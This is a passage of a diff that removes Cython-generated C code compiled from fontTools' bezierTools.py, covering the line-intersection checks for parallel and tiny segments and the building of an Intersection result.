PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_2, __pyx_v_s1x, __pyx_v_s2x}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_1); if 
(unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 1175, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_8 = (!__pyx_t_7); - __pyx_t_5 = __pyx_t_8; - __pyx_L12_bool_binop_done:; - - /* "fontTools/misc/bezierTools.py":1174 - * s2x, s2y = s2 - * e2x, e2y = e2 - * if ( # <<<<<<<<<<<<<< - * math.isclose(s2x, e2x) and math.isclose(s1x, e1x) and not math.isclose(s1x, s2x) - * ): # Parallel vertical - */ - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1177 - * math.isclose(s2x, e2x) and math.isclose(s1x, e1x) and not math.isclose(s1x, s2x) - * ): # Parallel vertical - * return [] # <<<<<<<<<<<<<< - * if ( - * math.isclose(s2y, e2y) and math.isclose(s1y, e1y) and not math.isclose(s1y, s2y) - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1177, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1174 - * s2x, s2y = s2 - * e2x, e2y = e2 - * if ( # <<<<<<<<<<<<<< - * math.isclose(s2x, e2x) and math.isclose(s1x, e1x) and not math.isclose(s1x, s2x) - * ): # Parallel vertical - */ - } - - /* "fontTools/misc/bezierTools.py":1179 - * return [] - * if ( - * math.isclose(s2y, e2y) and math.isclose(s1y, e1y) and not math.isclose(s1y, s2y) # <<<<<<<<<<<<<< - * ): # Parallel horizontal - * return [] - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_math); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_isclose); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - 
__Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_3, __pyx_v_s2y, __pyx_v_e2y}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_t_8 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_8 < 0))) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_8) { - } else { - __pyx_t_5 = __pyx_t_8; - goto __pyx_L16_bool_binop_done; - } - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_math); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_isclose); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_2, __pyx_v_s1y, __pyx_v_e1y}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_8 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_8 < 0))) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_8) { - } else { - __pyx_t_5 = __pyx_t_8; - goto __pyx_L16_bool_binop_done; - } - 
__Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_math); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_isclose); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_3, __pyx_v_s1y, __pyx_v_s2y}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_t_8 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_8 < 0))) __PYX_ERR(0, 1179, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_7 = (!__pyx_t_8); - __pyx_t_5 = __pyx_t_7; - __pyx_L16_bool_binop_done:; - - /* "fontTools/misc/bezierTools.py":1178 - * ): # Parallel vertical - * return [] - * if ( # <<<<<<<<<<<<<< - * math.isclose(s2y, e2y) and math.isclose(s1y, e1y) and not math.isclose(s1y, s2y) - * ): # Parallel horizontal - */ - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1181 - * math.isclose(s2y, e2y) and math.isclose(s1y, e1y) and not math.isclose(s1y, s2y) - * ): # Parallel horizontal - * return [] # <<<<<<<<<<<<<< - * if math.isclose(s2x, e2x) and math.isclose(s2y, e2y): # Line segment is tiny - * return [] - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1181, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_r = __pyx_t_1; - 
__pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1178 - * ): # Parallel vertical - * return [] - * if ( # <<<<<<<<<<<<<< - * math.isclose(s2y, e2y) and math.isclose(s1y, e1y) and not math.isclose(s1y, s2y) - * ): # Parallel horizontal - */ - } - - /* "fontTools/misc/bezierTools.py":1182 - * ): # Parallel horizontal - * return [] - * if math.isclose(s2x, e2x) and math.isclose(s2y, e2y): # Line segment is tiny # <<<<<<<<<<<<<< - * return [] - * if math.isclose(s1x, e1x) and math.isclose(s1y, e1y): # Line segment is tiny - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_math); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1182, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_isclose); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1182, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_2, __pyx_v_s2x, __pyx_v_e2x}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1182, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 1182, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_7) { - } else { - __pyx_t_5 = __pyx_t_7; - goto __pyx_L20_bool_binop_done; - } - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_math); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1182, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); 
- __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_isclose); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1182, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_3, __pyx_v_s2y, __pyx_v_e2y}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1182, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 1182, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_5 = __pyx_t_7; - __pyx_L20_bool_binop_done:; - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1183 - * return [] - * if math.isclose(s2x, e2x) and math.isclose(s2y, e2y): # Line segment is tiny - * return [] # <<<<<<<<<<<<<< - * if math.isclose(s1x, e1x) and math.isclose(s1y, e1y): # Line segment is tiny - * return [] - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1183, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1182 - * ): # Parallel horizontal - * return [] - * if math.isclose(s2x, e2x) and math.isclose(s2y, e2y): # Line segment is tiny # <<<<<<<<<<<<<< - * return [] - * if math.isclose(s1x, e1x) and math.isclose(s1y, e1y): # Line segment is tiny - */ - } - - /* "fontTools/misc/bezierTools.py":1184 - * if math.isclose(s2x, e2x) and math.isclose(s2y, 
e2y): # Line segment is tiny - * return [] - * if math.isclose(s1x, e1x) and math.isclose(s1y, e1y): # Line segment is tiny # <<<<<<<<<<<<<< - * return [] - * if math.isclose(e1x, s1x): - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_math); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1184, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_isclose); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1184, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_2, __pyx_v_s1x, __pyx_v_e1x}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1184, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 1184, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_7) { - } else { - __pyx_t_5 = __pyx_t_7; - goto __pyx_L23_bool_binop_done; - } - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_math); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1184, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_isclose); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1184, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if 
(likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_3, __pyx_v_s1y, __pyx_v_e1y}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1184, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_t_7 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_7 < 0))) __PYX_ERR(0, 1184, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_5 = __pyx_t_7; - __pyx_L23_bool_binop_done:; - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1185 - * return [] - * if math.isclose(s1x, e1x) and math.isclose(s1y, e1y): # Line segment is tiny - * return [] # <<<<<<<<<<<<<< - * if math.isclose(e1x, s1x): - * x = s1x - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1185, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1184 - * if math.isclose(s2x, e2x) and math.isclose(s2y, e2y): # Line segment is tiny - * return [] - * if math.isclose(s1x, e1x) and math.isclose(s1y, e1y): # Line segment is tiny # <<<<<<<<<<<<<< - * return [] - * if math.isclose(e1x, s1x): - */ - } - - /* "fontTools/misc/bezierTools.py":1186 - * if math.isclose(s1x, e1x) and math.isclose(s1y, e1y): # Line segment is tiny - * return [] - * if math.isclose(e1x, s1x): # <<<<<<<<<<<<<< - * x = s1x - * slope34 = (e2y - s2y) / (e2x - s2x) - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_math); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1186, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_isclose); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1186, 
__pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_2, __pyx_v_e1x, __pyx_v_s1x}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1186, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 1186, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1187 - * return [] - * if math.isclose(e1x, s1x): - * x = s1x # <<<<<<<<<<<<<< - * slope34 = (e2y - s2y) / (e2x - s2x) - * y = slope34 * (x - s2x) + s2y - */ - __Pyx_INCREF(__pyx_v_s1x); - __pyx_v_x = __pyx_v_s1x; - - /* "fontTools/misc/bezierTools.py":1188 - * if math.isclose(e1x, s1x): - * x = s1x - * slope34 = (e2y - s2y) / (e2x - s2x) # <<<<<<<<<<<<<< - * y = slope34 * (x - s2x) + s2y - * pt = (x, y) - */ - __pyx_t_1 = PyNumber_Subtract(__pyx_v_e2y, __pyx_v_s2y); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1188, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = PyNumber_Subtract(__pyx_v_e2x, __pyx_v_s2x); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1188, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyNumber_Divide(__pyx_t_1, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1188, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_v_slope34 = __pyx_t_2; - __pyx_t_2 = 0; - - 
/* "fontTools/misc/bezierTools.py":1189 - * x = s1x - * slope34 = (e2y - s2y) / (e2x - s2x) - * y = slope34 * (x - s2x) + s2y # <<<<<<<<<<<<<< - * pt = (x, y) - * return [ - */ - __pyx_t_2 = PyNumber_Subtract(__pyx_v_x, __pyx_v_s2x); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1189, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Multiply(__pyx_v_slope34, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1189, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_3, __pyx_v_s2y); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1189, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_v_y = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1190 - * slope34 = (e2y - s2y) / (e2x - s2x) - * y = slope34 * (x - s2x) + s2y - * pt = (x, y) # <<<<<<<<<<<<<< - * return [ - * Intersection( - */ - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1190, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_x); - __Pyx_GIVEREF(__pyx_v_x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_x)) __PYX_ERR(0, 1190, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_y); - __Pyx_GIVEREF(__pyx_v_y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_y)) __PYX_ERR(0, 1190, __pyx_L1_error); - __pyx_v_pt = ((PyObject*)__pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1191 - * y = slope34 * (x - s2x) + s2y - * pt = (x, y) - * return [ # <<<<<<<<<<<<<< - * Intersection( - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - */ - __Pyx_XDECREF(__pyx_r); - - /* "fontTools/misc/bezierTools.py":1192 - * pt = (x, y) - * return [ - * Intersection( # <<<<<<<<<<<<<< - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - * ) - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_Intersection); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1192, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - - /* 
"fontTools/misc/bezierTools.py":1193 - * return [ - * Intersection( - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) # <<<<<<<<<<<<<< - * ) - * ] - */ - __pyx_t_3 = __Pyx_PyDict_NewPresized(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1193, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_pt, __pyx_v_pt) < 0) __PYX_ERR(0, 1193, __pyx_L1_error) - __Pyx_GetModuleGlobalName(__pyx_t_9, __pyx_n_s_line_t_of_pt); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 1193, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_10 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_9))) { - __pyx_t_10 = PyMethod_GET_SELF(__pyx_t_9); - if (likely(__pyx_t_10)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_9); - __Pyx_INCREF(__pyx_t_10); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_9, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_10, __pyx_v_s1, __pyx_v_e1, __pyx_v_pt}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_9, __pyx_callargs+1-__pyx_t_6, 3+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_10); __pyx_t_10 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1193, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - } - if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_t1, __pyx_t_1) < 0) __PYX_ERR(0, 1193, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_9, __pyx_n_s_line_t_of_pt); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 1193, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_10 = NULL; - __pyx_t_6 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_9))) { - __pyx_t_10 = PyMethod_GET_SELF(__pyx_t_9); - if (likely(__pyx_t_10)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_9); - __Pyx_INCREF(__pyx_t_10); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_9, function); - __pyx_t_6 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_10, 
__pyx_v_s2, __pyx_v_e2, __pyx_v_pt}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_9, __pyx_callargs+1-__pyx_t_6, 3+__pyx_t_6); - __Pyx_XDECREF(__pyx_t_10); __pyx_t_10 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1193, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - } - if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_t2, __pyx_t_1) < 0) __PYX_ERR(0, 1193, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1192 - * pt = (x, y) - * return [ - * Intersection( # <<<<<<<<<<<<<< - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - * ) - */ - __pyx_t_1 = __Pyx_PyObject_Call(__pyx_t_2, __pyx_empty_tuple, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1192, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1191 - * y = slope34 * (x - s2x) + s2y - * pt = (x, y) - * return [ # <<<<<<<<<<<<<< - * Intersection( - * pt=pt, t1=_line_t_of_pt(s1, e1, pt), t2=_line_t_of_pt(s2, e2, pt) - */ - __pyx_t_3 = PyList_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1191, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyList_SET_ITEM(__pyx_t_3, 0, __pyx_t_1)) __PYX_ERR(0, 1191, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_r = __pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - - /* 